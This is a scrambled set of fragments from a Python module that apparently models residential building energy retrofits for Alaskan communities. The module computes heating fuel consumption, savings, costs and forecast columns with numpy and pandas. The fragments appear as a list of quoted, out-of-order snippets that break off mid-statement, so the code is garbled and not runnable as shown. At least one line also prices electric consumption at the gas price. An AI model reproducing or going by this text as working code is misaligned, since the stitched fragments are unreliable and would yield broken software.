self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler", "the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings =", "__init__ (self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters", "pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type. Attributes", "self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost", "fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total consumption Parameters", "* HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords", "component body ------------------------------------- \"\"\" import numpy as np from pandas import DataFrame import", "r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price", "Parameters ---------- fuel_amnt: float % of fuel used total_consumption : float total consumption", "np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area", "NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of", "\"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\",", "(cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year)", "r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost =", "Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized", "community. Initial value: 'Residential Buildings' section of community_data See also -------- aaem.community_data :", "Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\",", "natural gas fuel consumption savings_LP : float savings in propane consumption savings_kWh :", "self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of project(actual", "costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\"", "Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg", "r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year)", "gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price", "---------- scalers : dictionary of valid scalers, optional Scalers to adjust normal run", "Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\",", "## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH", "Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood", "percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"])", "Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\":", "information on Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object", "self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler", "= self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost", "Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating", "Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating", ": dictionary of components, optional prerequisite component data this component has no prerequisites", "module estimates the potential improvements to heating efficiency of residential buildings (homes). Consumption", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year)", "np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI", "\\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption *", "Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption =", "self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption =", "self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\"", "self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost =", "#~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the", "* LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf", "constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \"", "percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar", "r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year)", "self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv", "for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH :", "estimating future values initial value: forecast cd : dictionary general data for a", "def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption :", "proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed", "Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec,", "= False self.reason = \"Not a residential project.\" return # needed for electric", "for a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\"", "b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost", "community_data comp_specs : dictionary component specific data for a community. Initial value: 'Residential", "self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"])", "percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) /", "costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels per year", "component specific data for a community. Initial value: 'Residential Buildings' section of community_data", "COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item(", "(Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel", "Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg.", "= \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption)", "self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name,", "# coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a", "aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics", "costs. Attributes ---------- capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs", "(Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential:", "= 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF =", "cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural", "per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price", "Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential:", "Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential:", "kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction", "= np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total =", "Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass", "electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd =", "- self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption -", "r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost =", "Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost", ": CommunityData CommunityData Object for a community forecast : Forecast forecast for a", ") #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate", "+\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\", "/ 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt =", "percentage of the pre-retrofit consumption, and the forecasted price of offset heating fuels.", "[mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh)", "fuels. The cost to retrofit each home is also calculated. Parameters ---------- community_data", "float conversion factor Returns ------- float: fuel consumed for a type of fuel", "self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run = False", "self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"])", "Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\" tag =", "Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post", "fname = fname.replace(\" \",\"_\") # save to end of project(actual lifetime) df.ix[:self.actual_end_year].to_csv(fname, index_label=\"year\")", "Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost,", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel", "household (kWh/year). >= 6000 \"\"\" # 500 average energy use, 12 months in", "households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def", "= b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption *", "capital costs. \"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+')", "+= amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~", "[\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas =", "[mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP)", "\"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of project(actual lifetime) df.ix[:self.actual_end_year].to_csv(fname,", "np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf)", "no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average", "kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print", "calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that can", "year. That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh per", "Returns ------- float the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life]", "= con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh", "new diagnostics object forecast : forecast community forecast for estimating future values initial", "the first year of the project Attributes ---------- init_HH : int estimated households", "the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the difference", "the component output csv in directory Parameters ---------- directory : path output directory", "df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\")", "= self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price", "Attributes ---------- run : bool True in the component runs to completion, False", "of valid scalers, optional Scalers to adjust normal run variables. See note on", "float total consumption for residential buildings HH : float a # of houses", "price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF)", "self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv in directory Parameters", "self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of", "heating oil consumption init_wood : float initial heating cordwood consumption init_gas : float", ": np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption", "Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\",", "consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption", "= np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption", "0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt,", "= COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\", "years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\", "#HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH )", "b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price", "Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(),", "electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per year", "* gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def", "= self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price']", "+ df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname", "s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption", "np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+", "was negative, setting to 0\" ) ## % as decimal #~ self.percent_savings =", "HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost", "# needed for electric or HF component and has a default value self.calc_avg_consumption()", "self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption", "and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual", "Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of", "households for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total", "rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~", "\"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post", "heating savings created by the project Attributes ---------- annual_heating_savings : np.array heating savings", "= self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost :", "consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data']", "Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\":", "Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt", "\"\"\"calculate annual heating savings created by the project Attributes ---------- annual_heating_savings : np.array", "component data this component has no prerequisites leave empty Attributes ---------- diagnostics :", "\"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential:", "total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\", "- HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption", "dictionary of components, optional prerequisite component data this component has no prerequisites leave", "b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year)", "COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy", "\"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast", "households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH", "EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption =", "consumption savings_wood : float savings in heating cordwood consumption savings_gas : float savings", "self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\",", "\"\"\"calculate the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array", ": np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel", "np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~", "#~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords)", "identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH *", "total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP =", "np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array", "* \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] )", "self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64(", "import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import", "Levelized Cost of Energy, and Internal Rate of Return will all be calculated.", "Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df =", "self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost", "(self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float total cost of", "Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural", "base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate", "Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\":", "Initial value: 'Residential Buildings' section of community_data See also -------- aaem.community_data : community", "Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net", "+\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of", "(\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH", "Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost", "kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost", "electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption()", "Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost", "* \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption", "area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler", "Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating", "(self): \"\"\"Get the average monthly consumption of electricity for a house. Attributes ----------", "refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"],", "\\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH", "self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post", "forecast cd : dictionary general data for a community. Initial value: 'community' section", "[mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save", "Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential", "this component has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for", "self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel", "\"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years,", "- r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG", ">= 6000 \"\"\" # 500 average energy use, 12 months in a year.", "EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted =", "Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year)", "consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name,", "self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel sources", "1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF)", "total energy produced. Returns ------- float the total energy produced \"\"\" # no", "Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area *", "Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All", "* gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df", "Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating", "Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post", "a community forecast : Forecast forecast for a community diagnostics : diagnostics, optional", "the performance improvements as a percentage of the pre-retrofit consumption, and the forecasted", "price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan", "year of the project Attributes ---------- init_HH : int estimated households for first", "consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane", "prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print", "np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption", "---------- proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def", "units that have not been retrofit as of 2010, the performance improvements as", "Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption", "\"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price 